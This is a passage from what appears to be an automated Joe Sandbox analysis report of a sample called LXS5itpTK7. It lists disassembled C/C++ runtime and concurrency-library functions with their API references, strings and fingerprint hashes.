Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0214C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0214C6DC
atomic_compare_exchange.LIBCONCRT ref: 0214C700
std::_Cnd_initX.LIBCPMT ref: 0214C711
std::_Cnd_initX.LIBCPMT ref: 0214C71F

Part of subcall function 02131370: __Mtx_unlock.LIBCPMT ref: 02131377

std::_Cnd_initX.LIBCPMT ref: 0214C72F

Part of subcall function 0214C3EF: __Cnd_broadcast.LIBCPMT ref: 0214C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0214C73D

Strings

t#D, xrefs: 0214C6C2

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 20a29ce73e19460ede54e456e670a6a564a2c9d25b1a11acae7f333f13350d2a
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 4801A276981605AFCB11B7A0CD85B9EB36AAF04314F144162E90997680EF78EB158FD2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 02161129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

_free.LIBCMT ref: 02161444
_free.LIBCMT ref: 0216145D
_free.LIBCMT ref: 0216148F
_free.LIBCMT ref: 02161498
_free.LIBCMT ref: 021614A4

Strings

C, xrefs: 02161291

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
Instruction ID: 57fb7d2aaec7bf1a8d9768b062aa4c88ded3c1783cc64269045c2701991faa7b
Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
Instruction Fuzzy Hash: 3FB13975A41219AFDB24DF28C888BADB7B5FB08314F1485EAD84DA7350D730AEA0CF40

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 0216A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0216A184
_free.LIBCMT ref: 0216A192
_free.LIBCMT ref: 0216A2C0
_free.LIBCMT ref: 0216A2CB

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
Instruction ID: 4d4125fed80341af12b4440523c2b2f81895ac76e3b2fa6fdfeac938d9ddda8d
Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
Instruction Fuzzy Hash: 3F61E172980205AFDB20CF68C849BBEBBF5EF44710F2441AAED54FB241D77199A1CB90

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 02163AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0216425F,?,?,?,?,?,?), ref: 02163B2C
__fassign.LIBCMT ref: 02163BA7
__fassign.LIBCMT ref: 02163BC2
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 02163BE8
WriteFile.KERNEL32(?,?,00000000,0216425F,00000000,?,?,?,?,?,?,?,?,?,0216425F,?), ref: 02163C07
WriteFile.KERNEL32(?,?,00000001,0216425F,00000000,?,?,?,?,?,?,?,?,?,0216425F,?), ref: 02163C40

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
Instruction ID: 48404050f26a2e43886de29533a50cb316fa50ee8ee22ff1ed0cd98964ba743b
Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
Instruction Fuzzy Hash: 3D51E574D00209AFCB10CFA8D888AEEBBF5EF09714F15415AE565E7291D7309A91CF60

Function 02154AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02154ACD

Part of subcall function 02154D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02154800), ref: 02154DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02154AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02154AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02154AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02154B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02154BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02154BC3

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 074ee6e2fb579be8e29311b1338e225e09b271883fd4adf111851d2a7252b0d5
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: CC31D039A40224DFCF18EF68C880A6DB3BAFF44310F2045E5ED359B245DB70EA45CA90

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 0216FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
Instruction ID: 193b3012ed5c4a69d70b5325de1ce58a096a72518f57c836a2a9e2d7b8000cee
Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
Instruction Fuzzy Hash: 1011B731984129BFDB252F759C4CD7F7A5EEF85B617110665FC36C7240DB308511CAA0

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 0216A5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0216A331: _free.LIBCMT ref: 0216A35A

_free.LIBCMT ref: 0216A638

Part of subcall function 021636D1: HeapFree.KERNEL32(00000000,00000000,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?), ref: 021636E7
Part of subcall function 021636D1: GetLastError.KERNEL32(?,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?,?), ref: 021636F9

_free.LIBCMT ref: 0216A643
_free.LIBCMT ref: 0216A64E
_free.LIBCMT ref: 0216A6A2
_free.LIBCMT ref: 0216A6AD
_free.LIBCMT ref: 0216A6B8
_free.LIBCMT ref: 0216A6C3

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 517caf42299e6ec12995a3560f26e8e84d89c5be85dc008314a1a64a6020a207
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 8C115172684B84AEDE20B7B1CC4DFEF779EDF00700F440825A2A9BA250DB65B5744EA0

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 02142659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02140DA0,?,?,?,00000000), ref: 02142667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140DA0,?,?,?,00000000), ref: 0214266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02140DA0,?,?,?,00000000), ref: 0214269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140DA0,?,?,?,00000000), ref: 021426A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02140DA0,?,?,?,00000000), ref: 021426B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021426CC
__CxxThrowException@8.LIBVCRUNTIME ref: 021426DA

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 179c5c5e0dc5b83cd88fd215f31e8b3f4c484a7f99968f6d6eaf645d4882eb98
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: C401A735A81115ABD724BF65EC48FAF3B69AF42B52B500535FC19D3060DF34D9848AE8

Function 021424A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0214670B), ref: 021424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0214670B), ref: 02142500
GetProcAddress.KERNEL32(00000000), ref: 02142507
GetLastError.KERNEL32(?,?,?,0214670B), ref: 02142522
GetLastError.KERNEL32(?,?,?,0214670B), ref: 0214252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142544
__CxxThrowException@8.LIBVCRUNTIME ref: 02142552

Strings

kernel32.dll, xrefs: 021424B0, 021424B5, 021424FA

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 389b6ab86509eeb79e5c92ad9fb351b04078aebc16b8b1d2cbea2f428b5e6562
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: ABF0817A9403103FB7113B797C9995B3FADDE4AA223200636FC15E2291EF7585818A6C

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::badbit set, xrefs: 0040C63A, 0040C65A
F(@, xrefs: 0040C651
ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C61B
ios_base::failbit set, xrefs: 0040C644

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 0216239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021625EC,00000001,00000001,?), ref: 021623F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021625EC,00000001,00000001,?,?,?,?), ref: 0216247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02162575
__freea.LIBCMT ref: 02162582

Part of subcall function 0216390E: RtlAllocateHeap.NTDLL(00000000,0213DAD7,00000000), ref: 02163940

__freea.LIBCMT ref: 0216258B
__freea.LIBCMT ref: 021625B0

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
Instruction ID: 543e671fa14f85edade463bf53bc0ece0125f02b8fd581ae3fabfe7845dbbb6b
Opcode Fuzzy Hash: 089065164f7acbcee2a009b1ab595d824f5b463daa05b22f9118c45ebaa118bc
Instruction Fuzzy Hash: 7651C272A80226AFDB358F64CC68EFF77AAEB44754F164628FC14D6150DBB4DC60CA90

Function 0215E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0215E445
__cftoe.LIBCMT ref: 0215E477

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
Instruction ID: aef20a45bbc358239b70555b5feee017e7b4272ee782651eb7d7f9b4fa937ef6
Opcode Fuzzy Hash: 6290ddc8ebea7097b1647a61380f344cd02ada4a64146fe838c0f2f7cf2ccb9a
Instruction Fuzzy Hash: EA51F636D84215EFDF249F688C44BAE77AAAF48374F1042E9EC35D2181EB31D7108AA4

Function 0215302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02153051

Part of subcall function 02148AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02148ABD

SafeSQueue.LIBCONCRT ref: 0215306A
Concurrency::location::_Assign.LIBCMT ref: 0215312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0215314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02153159

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: 1c66c7a4516a7630dfc3ff87541a999834236b4150f3172b102ceaa3d5444d97
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 2B31DF31A40621DFCB29EF74C884A6AB7B1FF44790F1545E9EC2A8B251DB70E945CBD0

Function 02158F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 02158F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 02158F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 02158F97
PMDtoOffset.LIBCMT ref: 02158FB6

Memory Dump Source

